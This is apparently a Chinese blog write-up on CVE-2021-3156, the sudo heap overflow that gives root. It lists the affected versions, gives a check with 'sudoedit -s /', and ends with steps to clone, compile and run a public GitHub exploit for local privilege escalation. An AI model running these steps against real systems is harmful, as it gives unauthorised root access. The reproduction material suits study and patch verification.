简介

  • 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞.利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下.此漏洞已分配为CVE-2021-3156,危险等级评分为7分.
  • sudo通过-s-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符.但使用-s-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出.因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限.研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31),Debian 10(sudo 1.8.27)Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击.
  • 在centos系统中,该漏洞经过测试证明存在该漏洞,但是利用失败,可以通过升级sudo到安全版本修复该漏洞

受影响版本

  • Sudo 1.8.2 - 1.8.31p2
  • Sudo 1.9.0 - 1.9.5p1

不受影响版本

  • sudo - 1.9.5p2

漏洞复现

  • 查看linux版本和sudo版本
lsb_release -a
sudo -V

20210205141356.png

测试漏洞是否存在

#如果返回以sudoedit:开头的错误,则当前系统可能存在安全风险
#不受影响的系统将显示以usage:开头的错误
sudoedit -s /

存在漏洞

20210209212649.png

不存在漏洞

QQ截图20210628153530.jpg

下载exp

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
#编译
make
#添加执行权限
chmod a+x sudo-hax-me-a-sandwich
#运行
./sudo-hax-me-a-sandwich 0

20210209213414.png

20210205140339.png

20210205140424.png

20210205140523.png